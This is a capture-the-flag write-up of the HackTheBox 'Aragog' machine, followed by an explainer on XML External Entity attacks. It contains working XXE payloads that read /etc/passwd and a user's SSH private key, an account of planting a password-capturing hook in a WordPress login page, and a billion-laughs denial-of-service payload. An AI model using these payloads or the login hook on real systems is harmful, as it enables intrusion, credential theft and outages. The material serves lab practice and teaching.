Aragog was a delightful challenge on HackTheBox. It’s up there with one of my favourites so far!

To complete this box, I was able to get a shell by exploiting an XML External Entity (XXE) vulnerability and lifting the ssh key file of a user. Once logged in, I discovered a hidden WordPress site containing a few clues. I then created a simple keylogger to capture the password of a user login in into to the WordPress site, and due to some password re-usage, was able to escalate to root.

Hacking the box

  1. Enumeration
  2. Exploitation
  3. Privilege escalation
  4. Deconstructing the hack


Start with a nmap scan

[email protected]:~/htb/aragog# nmap -sV -sC -oA aragog
Starting Nmap 7.70 ( ) at 2018-07-21 19:14 AEST
Nmap scan report for
Host is up (0.31s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 52.85 seconds

The scan shows us that we have FTP and HTTP open, as well as the regular SSH.

Starting with the web server, I throw the IP into a browser and take a look. All I get is the default apache2 index.html.


I run dirbuster, and it reveals hosts.php.

Starting dir/file list based brute forcing
Dir found: / - 200
Dir found: /icons/ - 403
Dir found: /icons/small/ - 403
File found: /wp-login.php - 500
File found: /hosts.php - 200

I browse and take a look. htb-aragog-02 An interesting little web app. It looks like it calculates the number of hosts in a subnet, but there doesn’t seem to be any way to feed it any network/subnet information.

I decide to move on and poke at the FTP server. The first thing I try is logging in anonymously.

[email protected]:~/htb/aragog# ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Success! Listing the directory shows a single file - test.txt.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
226 Directory send OK.

So naturally, I download it.

ftp> get test.txt
local: test.txt remote: test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (86 bytes).
226 Transfer complete.
86 bytes received in 0.00 secs (66.5486 kB/s)

The contents of test.txt seems to be XML.

[email protected]:~/htb/aragog# cat test.txt 
[email protected]:~/htb/aragog# 

The information inside this XML document looks like it could be related to what the hosts.php page is displaying. To find out, I sent the XML file over to the page to see what happens.

[email protected]:~/htb/aragog# curl -X POST -d @test.txt

There are 62 possible hosts for

[email protected]:~/htb/aragog# 

It looks like I’m doing XML injection today! One small problem though. I don’t know anything about XML injection.


After a few hours of googling xml vulnerabilities, I learn about a technique called XML External Entities (XXE) which is sitting at #4 on the 2017 OWASP Top 10

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when a weakly configured XML parser processes XML input containing a reference to an external entity. This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

It seems that if this web server is vulnerable to XXE, I should be able to manipulate the XML file to reference an entity that is external to the XML document, such as a local file on the system.

I look at some example XML documents that exploit XXE, modify the XML in test.txt and save the file as totallylegit.xml.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>


If this works, it should return the contents of /etc/passwd. I throw the XML containing XXE at hosts.php and see what happens.

[email protected]:~/htb/aragog# curl -X POST -d @totallylegit.xml

There are 4294967294 possible hosts for root:x:0:0:root:/root:/bin/bash
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:123:130:ftp daemon,,,:/srv/ftp:/bin/false

I rerun the command and grep for /bin/bash to find all users with access to a shell.

[email protected]:~/htb/aragog# curl -X POST -d @totallylegit.xml | grep /bin/bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2681  100  2487  100   194   3953    308 --:--:-- --:--:-- --:--:--  4262
There are 4294967294 possible hosts for root:x:0:0:root:/root:/bin/bash

To recap, at this point I have:
- two accounts with shell access
- an open SSH port
- method to read files on disk.

Time to get dem’ SSH keys!

I craft a new XML document and save as florian-key.xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///home/florian/.ssh/id_rsa" >]>


I throw this one at hosts.php and redirect the output to ./florian.key.

[email protected]:~/htb/aragog# curl -X POST -d @florian-key.xml > florian.key                                                         
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                                                          
                                 Dload  Upload   Total   Spent    Left  Speed
100  1933  100  1725  100   208   2751    331 --:--:-- --:--:-- --:--:--  3082    

After a little clean up, I’ve got a RSA key for florian.


I try the same thing for cliff but no luck. I can’t read cliff’s RSA key. 😪 Not to worry, I move on and get a shell on Aragog.

[email protected]:~/htb/aragog# chmod 400 florian.key
[email protected]:~/htb/aragog# ssh [email protected] -i florian.key 
Last login: Sat Jul 21 03:13:11 2018 from
[email protected]:~$ 

user shell obtained!

Privilege escalation

The first thing I always do when I get a shell is to start enumerating the system. I start with the web directory to see if any files/folders were not picked up in the dirbuster scan.

[email protected]:/var/www/html$ ls -l
total 24
drwxrwxrwx 5 cliff    cliff     4096 Jul 21 03:30 dev_wiki
-rw-r--r-- 1 www-data www-data   689 Dec 21  2017 hosts.php
-rw-r--r-- 1 www-data www-data 11321 Dec 18  2017 index.html
drw-r--r-- 5 cliff    cliff     4096 Dec 20  2017 zz_backup
[email protected]:/var/www/html$ 

Unfortunately, I don’t have permissions to see the contents of the zz_backup directory

[email protected]:/var/www/html$ cd zz_backup/
-bash: cd: zz_backup/: Permission denied

I instead browse to /dev_wiki, but I get redirected to the hostname of the machine. htb-aragog-03

To fix that, I simply add the IP of Aragog to my hosts file.

[email protected]:~/htb/aragog# echo " aragog" >> /etc/hosts


I browse around the blog and see this post that looks of interest. htb-aragog-05

From this post, I notice two critical pieces of information.

  1. … probably be restoring the site from backup fairly frequently!

  2. I’ll be logging in regularly…

Cliff is logging in and running backups on a regular basis. More importantly, this is an administrative task that I may be able to abuse to escalate privilege.

I try to see if cliff has anything is scheduled, like a backup task.

[email protected]:/dev/shm$ crontab -u cliff -l
must be privileged to use -u
[email protected]:/dev/shm$ 

No luck. Time to get sneaky.

To find out in exactly what Cliff is doing, I create and run a simple process monitor shell script. This script watches the list of running processes, and display any new processes that start.


# Loop by line

old_proces=$(ps -eo command)

while true
  new_process=$(ps -eo command)
  diff <(echo "$old_process") < (echo "$new_process") | grep [\<\>]
  sleep 1

I monitor the processes for a little while and eventually get a hit. I’m able to capture a cron job being executed that uses a python script ( to log cliff into the Wordpress blog, as well as a restore script aimed at the wiki. This is exactly what the blog post said would be happening.

/usr/sbin/CRON -f
< /bin/sh -c /usr/bin/python /home/cliff/
< /bin/sh -c /bin/bash /root/
< /usr/bin/python /home/cliff/
< /bin/bash /root/
< rm -rf /var/www/html/dev_wiki/

Although I can’t access the script in cliff’s home directory, I can access the Wordpress login page located at /var/www/html/dev_html/wp-login.php. A simple keylogger will do the trick!

I browse to wp-login.php in my browser and view the source. I make a note of the name property on the password input field. htb-aragog-06

I edit wp-login.php and add some PHP code to the top of the file that writes the value entered into password field out to /dev/shm/totallynotapassword.txt htb-aragog-07

After waiting a little bit for the cron job to execute and cliff to log in again, I check for the loot.

[email protected]:/var/www/html/dev_wiki$ cat /dev/shm/totallynotapassword.txt 

Password obtained!

Armed with the password, I try and switch user to cliff.

[email protected]:/var/www/html/dev_wiki$ su - cliff
su: Authentication failure


How about root?

[email protected]:/var/www/html/dev_wiki$ su - root
[email protected]:~# 

Deconstructing the hack


The vulnerability exploited in this challenge is one that has been around for a while; however it’s making a solid comeback. The Open Web Application Security Project (OWASP) ranks this vulnerability as #4 on their top 10 for 2017, not simply because of its impact, but also the likelihood and how common this vulnerability has been exploited from reported breaches.

The problem was first reported as early as 2002 but was not seen to be widely addressed until 2008. The vulnerability is still present today, and OWASP has been seeing a rise in its exploitation resulting in it making the Top 10 list for 2017. The previous OWASP Top 10, which came out in 2014, did not include XXE.

In 2014, it was reported that an XXE vulnerability was found to affect all versions of WordPress and Drupal CMS platforms, as well as several Joomla extensions. It is said the exposure of the vulnerability endangered more than 250 million websites as a conservative guess, or more than a quarter of the entire internet’s website population at that time.

How it works

What are XML external entities?

An XML entity can be thought of as something that is used to describe data. This enables two systems running on different technologies to communicate and exchange data with one another using XML.

The example below is a sample XML document which describes a pet. The name, breed and age are called XML Elements.

<?xml version="1.0"?>
    <name>Fluffy, Destroyer of Worlds</name>

XML documents can also contain something called entities, which are defined using a system identifier in the DOCTYPE header. Entities can access local or remote content.

The example bleow is a sample XML document that contians XML entities.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE pets [ <!ELEMENT pets ANY >
<!ENTITY petName SYSTEM "file:///folder/pet1.txt" >]>


In the code above, the entity petName is substituted with the value file:///folder/pet1.txt. When the XML is parsed, this entity is replaced with the respective value. The use of the keyword SYSTEM instructs the parser that the entity value should be read from the URI that follows. This can be very useful when a web application needs to refer to an entity value many times.

What is an XXE attack?

As demonstrated in the above, using XML entities and the SYSTEM keyword causes an XML parser to read data from a URI and substitutes it within the document. This means that an attacker can send their own values and force the application to display it.

The example below is the XML document that I used to retrieve the SSH key of the florian user on Aragog.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///home/florian/.ssh/id_rsa" >]>


Here you can see I’m using the SYSTEM keyword to reference the URI of a file on the local disk. The XML parser reads the file, and displays it back to the user.

Known use cases

XXE was also most notably used in a Denial of Service (DOS) attack called the billion laughs attack, where the XXE payload contains multiple references to itself.

The example below defines 10 entities, each defined as consisting of 10 of the previous entity. When processed by the XML processor on the receiving server, this expands to one billion copies of the first entity. When this file is processed by the web server, all available resources are consumed attempting to do so, resulting in denial of service.

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">


Developer training is essential to identify and mitigate XXE. Besides that, preventing XXE requires:

If these controls are not possible, consider using virtual patching, API security gateways, or Web Application Firewalls (WAFs) to detect, monitor, and block XXE attacks.